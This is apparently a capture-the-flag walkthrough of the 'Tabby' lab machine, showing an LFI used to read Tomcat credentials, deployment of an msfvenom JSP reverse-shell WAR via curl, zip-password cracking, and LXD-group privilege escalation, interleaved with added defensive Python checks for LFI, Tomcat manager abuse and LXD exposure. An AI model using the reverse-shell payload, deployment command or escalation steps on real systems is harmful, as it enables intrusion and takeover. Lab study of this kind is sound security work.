Let's start with an Nmap scan:
root@liberty:~# nmap -A tabby.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-27 10:04 EDT
Nmap scan report for tabby.htb (10.129.28.106)
Host is up (0.015s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
| 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=10/27%OT=22%CT=1%CU=39779%PV=Y%DS=2%DC=T%G=Y%TM=5F9829
OS:05%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST
OS:11NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)EC
OS:N(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let's enumerate ports 80 and 8080 with Dirb:
root@liberty:~# dirb http://tabby.htb:8080
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Oct 27 10:06:36 2020
URL_BASE: http://tabby.htb:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://tabby.htb:8080/ ----
+ http://tabby.htb:8080/docs (CODE:302|SIZE:0)
+ http://tabby.htb:8080/examples (CODE:302|SIZE:0)
+ http://tabby.htb:8080/host-manager (CODE:302|SIZE:0)
+ http://tabby.htb:8080/index.html (CODE:200|SIZE:1895)
+ http://tabby.htb:8080/manager (CODE:302|SIZE:0)
-----------------
END_TIME: Tue Oct 27 10:07:52 2020
DOWNLOADED: 4612 - FOUND: 5
root@liberty:~# dirb http://tabby.htb
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Oct 27 10:06:01 2020
URL_BASE: http://tabby.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://tabby.htb/ ----
==> DIRECTORY: http://tabby.htb/assets/
+ http://tabby.htb/favicon.ico (CODE:200|SIZE:766)
==> DIRECTORY: http://tabby.htb/files/
+ http://tabby.htb/index.php (CODE:200|SIZE:14175)
+ http://tabby.htb/server-status (CODE:403|SIZE:274)
---- Entering directory: http://tabby.htb/assets/ ----
==> DIRECTORY: http://tabby.htb/assets/css/
==> DIRECTORY: http://tabby.htb/assets/fonts/
==> DIRECTORY: http://tabby.htb/assets/images/
==> DIRECTORY: http://tabby.htb/assets/js/
---- Entering directory: http://tabby.htb/files/ ----
==> DIRECTORY: http://tabby.htb/files/archive/
While poking around through the results I also wanted to test the sites for LFI or RFI vulnerabilities. While clicking each link on the site we noticed the news page redirected to megahosting.htb/news.php?file=statement. This file= parameter looks like it could be an LFI. Let's take a look at /etc/hosts and /etc/passwd.
With this access we should go after the Tomcat web server config. After some serious Googling we find that the Tomcat credentials live in usr/share/tomcat9/etc/tomcat-users.xml. When originally loading the page I was convinced the LFI wasn't working. ALWAYS VIEW THE SOURCE.
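As an added illustration (not part of this writeup and not the target's code), here is the dangerous `file=` include pattern next to a hardened version, with a small harness you can run over sample parameter values. The base directory, the article allowlist and the sample values are all assumed for the example; the target's real news.php is not on this page.

```python
import posixpath
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Assumed base directory and article allowlist (constructed for this example;
# the real news.php on the target is not shown on this page).
NEWS_DIR = "/var/www/news"
ALLOWED_ARTICLES = {"statement", "pricing", "about"}


def vulnerable_resolve(file_param: str) -> str:
    """Mirror the dangerous pattern behind news.php?file=statement: the
    user-controlled value is glued onto a base path and included as-is.
    Returns the canonical path such an include would actually open."""
    return posixpath.normpath(posixpath.join(NEWS_DIR, unquote(file_param)))


def escapes_base(resolved: str) -> bool:
    """True when the resolved path lies outside NEWS_DIR, i.e. the request
    would read an arbitrary file such as /etc/passwd (local file inclusion).
    commonpath() is used instead of a string prefix test so that a sibling
    directory like /var/www/newsletter is not mistaken for NEWS_DIR."""
    return posixpath.commonpath([NEWS_DIR, resolved]) != NEWS_DIR


def safe_resolve(file_param: str) -> Optional[str]:
    """Hardened lookup: only allowlisted article names are accepted, and the
    canonical path is still checked against NEWS_DIR as defence in depth."""
    name = unquote(file_param)
    if name not in ALLOWED_ARTICLES:
        return None
    resolved = posixpath.normpath(posixpath.join(NEWS_DIR, name))
    if escapes_base(resolved):
        return None
    return resolved


def review(params: List[str]) -> List[Tuple[str, str, bool, str]]:
    """For each file= value: the path the vulnerable code opens, whether that
    path escapes NEWS_DIR, and what the hardened code does with it."""
    rows = []
    for p in params:
        opened = vulnerable_resolve(p)
        verdict = "blocked" if safe_resolve(p) is None else "served"
        rows.append((p, opened, escapes_base(opened), verdict))
    return rows


if __name__ == "__main__":
    # Constructed sample of file= values as they might show up in an access log.
    samples = [
        "statement",
        "../../../etc/passwd",
        "%2e%2e/%2e%2e/%2e%2e/etc/hosts",
        "/etc/hosts",
        "../../newsletter/statement",
    ]
    for row in review(samples):
        print("%-32s -> %-28s escapes=%-5s %s" % row)
```

The harness shows the three ways the unvalidated include escapes (plain traversal, URL-encoded traversal, and an absolute path, which posixpath.join simply accepts), and that the allowlist blocks all of them while still serving the legitimate article.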
These creds get us in, but I don't see anywhere to upload a WAR. Java web applications are usually packaged as WAR files for deployment. ... These files can be created on the command line or with an IDE like Eclipse. After deploying our WAR file, Tomcat unpacks it and stores all project files in the webapps directory in a new directory named after the project.
We can find the syntax for generating this type of payload under my cheatsheets section:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
After creating our WAR reverse shell we can deploy it with curl:
curl -u 'tomcat:$3cureP4s5w0rd123!' -T shell.war 'http://tabby.htb:8080/manager/text/deploy?path=/shell'
After uploading the shell, let's start our listener and navigate to the page.
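Two checks a defender would want after reading this part, added here as example code (not from this writeup and not Tomcat's own tooling): the first parses a tomcat-users.xml and lists which accounts hold manager or admin roles, the second runs over a few Tomcat access-log lines and flags manager requests from untrusted addresses, rating a PUT to /manager/text/deploy as high. The XML content, the log lines and the trusted-address list are all constructed for the example; the password values are placeholders.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Roles that grant deployment or administrative control over Tomcat.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "admin-gui", "admin-script"}

# Constructed tomcat-users.xml in the layout Tomcat 9 ships; the password
# values are placeholders, not the target's.
TOMCAT_USERS_XML = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="PLACEHOLDER" roles="admin-gui,manager-script"/>
  <user username="status" password="PLACEHOLDER" roles="manager-status"/>
</tomcat-users>
"""


def privileged_tomcat_users(xml_text: str) -> Dict[str, List[str]]:
    """Map each username to the privileged roles it holds (an empty result
    means no account in the file can deploy or administer)."""
    root = ET.fromstring(xml_text)
    found: Dict[str, List[str]] = {}
    for elem in root.iter():
        # Strip the XML namespace so the check works with or without xmlns.
        if elem.tag.rsplit("}", 1)[-1] != "user":
            continue
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        hot = sorted(roles & PRIVILEGED_ROLES)
        if hot:
            found[elem.get("username", "?")] = hot
    return found


# Constructed access-log lines in the default AccessLogValve pattern
# (%h %l %u %t "%r" %s %b); addresses and timestamps are made up.
ACCESS_LOG = """\
10.10.14.5 - - [27/Oct/2020:10:20:11 -0400] "GET /index.html HTTP/1.1" 200 1895
10.10.14.5 - - [27/Oct/2020:10:29:50 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - tomcat [27/Oct/2020:10:31:07 -0400] "PUT /manager/text/deploy?path=/shell HTTP/1.1" 200 57
10.10.14.5 - - [27/Oct/2020:10:31:20 -0400] "GET /shell/ HTTP/1.1" 200 0
127.0.0.1 - tomcat [27/Oct/2020:10:40:00 -0400] "GET /manager/text/list HTTP/1.1" 200 120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)


def manager_alerts(log_text: str, trusted_ips=("127.0.0.1",)) -> List[dict]:
    """Flag every manager/host-manager request from an untrusted address.
    Deploy/undeploy calls and PUTs are rated high; everything else medium."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["ip"] in trusted_ips:
            continue
        path = m["path"]
        if not path.startswith(("/manager/", "/host-manager/")):
            continue
        high = m["method"] == "PUT" or "/deploy" in path or "/undeploy" in path
        alerts.append({
            "ip": m["ip"], "user": m["user"], "time": m["ts"],
            "request": "%s %s" % (m["method"], path), "status": m["status"],
            "severity": "high" if high else "medium",
        })
    return alerts


if __name__ == "__main__":
    print("privileged accounts:", privileged_tomcat_users(TOMCAT_USERS_XML))
    for a in manager_alerts(ACCESS_LOG):
        print(a["severity"], a["ip"], a["user"], a["request"], a["status"])
```

The role audit is the reason the LFI mattered: an account with manager-script can deploy through /manager/text without ever touching the HTML UI, so readable credentials for it are a full application compromise. The log check is deliberately keyed on the path prefix rather than on a status code, since the deploy that matters returns 200.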
After enumerating the box we find a backup zip. Let's take a look at that locally. To do this I will use nc to download the zip.
Tabby
nc -w 4 $IP $PORT < 16162020_backup.zip
Kali
:/home/tabby# nc -nlvp 443 > backup.zip
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.129.28.106.
Ncat: Connection from 10.129.28.106:54898.
root@liberty:/home/tabby# ls
backup.zip shell.war
root@liberty:/home/tabby#
The zip turned out to be encrypted, so I used fcrackzip with the rockyou wordlist and got a hit!
root@liberty:/home/tabby# fcrackzip -D -p /usr/share/wordlists/rockyou.txt backup.zip
possible pw found: admin@it ()
root@liberty:/home/tabby#
Let's try to get access to the user.txt file with these creds:
tomcat@tabby:/var/www/html/files$ su ash
Password: admin@it
ash@tabby:/var/www/html/files$ cat /home/ash/users.txt
FLAG HERE
Privilege Escalation:
Let's
After reviewing the groups Ash is a member of, I came across this article:
The article summarizes the priv esc as follows:
In order to escalate to root privilege on the host machine you have to create an image for lxd, thus you need to perform the following actions:
Steps to be performed on the attacker machine :
Download build-alpine in your local machine through the git repository.
Execute the script "build-alpine" that will build the latest Alpine image as a compressed file; this step must be executed by the root user.
Transfer the tar file to the host machine
Steps to be performed on the host machine:
Download the alpine image
Initialize the image inside a new container.
Mount the container inside the /root directory
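The steps above work because the user belongs to a group (lxd) that can create privileged containers and attach host paths to them, which is why membership in that group is treated as root-equivalent. As an added example (not from this writeup or the article it cites), the following script implements the two audits a defender would run on such a host: which accounts sit in root-equivalent groups, and which existing containers are privileged or mount a host path. The /etc/group excerpt and the JSON are constructed samples; the JSON is shaped like `lxc list --format json` output as I understand it (fields expanded_config, expanded_devices and the security.privileged key), trimmed to what the script reads.

```python
import json
from typing import Dict, List

# Membership in these groups is effectively root on a typical Linux host
# (lxd and docker can mount the host filesystem into a privileged container).
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "sudo", "wheel", "disk"}

# Constructed /etc/group excerpt (the user names are made up for the example).
ETC_GROUP = """\
root:x:0:
adm:x:4:syslog,ash
sudo:x:27:
lxd:x:116:ash
tomcat:x:998:
"""


def root_equivalent_members(group_text: str) -> Dict[str, List[str]]:
    """Return {group: [members]} for every root-equivalent group that has members."""
    findings: Dict[str, List[str]] = {}
    for line in group_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, _gid, members = line.split(":", 3)
        users = [u for u in members.split(",") if u]
        if name in ROOT_EQUIVALENT_GROUPS and users:
            findings[name] = users
    return findings


# Constructed sample shaped like `lxc list --format json` output (assumed field
# names, trimmed to what the audit reads). The "alpine" entry is the dangerous
# shape: privileged, with a host path attached as a disk device.
LXC_LIST_JSON = json.dumps([
    {"name": "web", "status": "Running",
     "expanded_config": {"security.privileged": "false"},
     "expanded_devices": {"root": {"type": "disk", "path": "/", "pool": "default"}}},
    {"name": "alpine", "status": "Running",
     "expanded_config": {"security.privileged": "true"},
     "expanded_devices": {
         "root": {"type": "disk", "path": "/", "pool": "default"},
         "host": {"type": "disk", "source": "/", "path": "/mnt/root", "recursive": "true"}}},
])


def risky_containers(lxc_json: str) -> List[dict]:
    """Flag containers that are privileged or mount a host path as a disk device.
    The pool-backed root disk has no 'source' key and is therefore not a host mount."""
    out = []
    for c in json.loads(lxc_json):
        privileged = c.get("expanded_config", {}).get("security.privileged", "false") == "true"
        host_mounts = sorted(
            d["source"] for d in c.get("expanded_devices", {}).values()
            if d.get("type") == "disk" and d.get("source", "").startswith("/")
        )
        if privileged or host_mounts:
            out.append({"name": c["name"], "privileged": privileged,
                        "host_mounts": host_mounts})
    return out


if __name__ == "__main__":
    print("root-equivalent group members:", root_equivalent_members(ETC_GROUP))
    for c in risky_containers(LXC_LIST_JSON):
        print("container %(name)s privileged=%(privileged)s host_mounts=%(host_mounts)s" % c)
```

On a real host you would feed the script the actual /etc/group and the output of `lxc list --format json`; a non-empty result from either function is the finding to act on (remove the user from the group, or stop treating that container as isolated).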
After following the article above the tool would not build; after a couple of Google searches I found this article:
I needed to add -a i686 to my build command:
root@liberty:~/htb/lxd-alpine-builder# ./build-alpine -a i686
Determining the latest release... v3.12
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86
Downloading alpine-keys-2.2-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading apk-tools-static-2.10.5-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading alpine-mirrors-3.5.10-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK
Verified OK
Selecting mirror http://alpine.mirror.far.fi/v3.12/main
fetch http://alpine.mirror.far.fi/v3.12/main/x86/APKINDEX.tar.gz
(1/19) Installing musl (1.1.24-r9)
(2/19) Installing busybox (1.31.1-r19)
Executing busybox-1.31.1-r19.post-install
(3/19) Installing alpine-baselayout (3.2.0-r7)
Executing alpine-baselayout-3.2.0-r7.pre-install
Executing alpine-baselayout-3.2.0-r7.post-install
(4/19) Installing openrc (0.42.1-r11)
Executing openrc-0.42.1-r11.post-install
(5/19) Installing alpine-conf (3.9.0-r1)
(6/19) Installing libcrypto1.1 (1.1.1g-r0)
(7/19) Installing libssl1.1 (1.1.1g-r0)
(8/19) Installing ca-certificates-bundle (20191127-r4)
(9/19) Installing libtls-standalone (2.9.1-r1)
(10/19) Installing ssl_client (1.31.1-r19)
(11/19) Installing zlib (1.2.11-r3)
(12/19) Installing apk-tools (2.10.5-r1)
(13/19) Installing busybox-suid (1.31.1-r19)
(14/19) Installing busybox-initscripts (3.2-r2)
Executing busybox-initscripts-3.2-r2.post-install
(15/19) Installing scanelf (1.2.6-r0)
(16/19) Installing musl-utils (1.1.24-r9)
(17/19) Installing libc-utils (0.7.2-r3)
(18/19) Installing alpine-keys (2.2-r0)
(19/19) Installing alpine-base (3.12.1-r0)
Executing busybox-1.31.1-r19.trigger
OK: 8 MiB in 19 packages
root@liberty:~/htb/lxd-alpine-builder#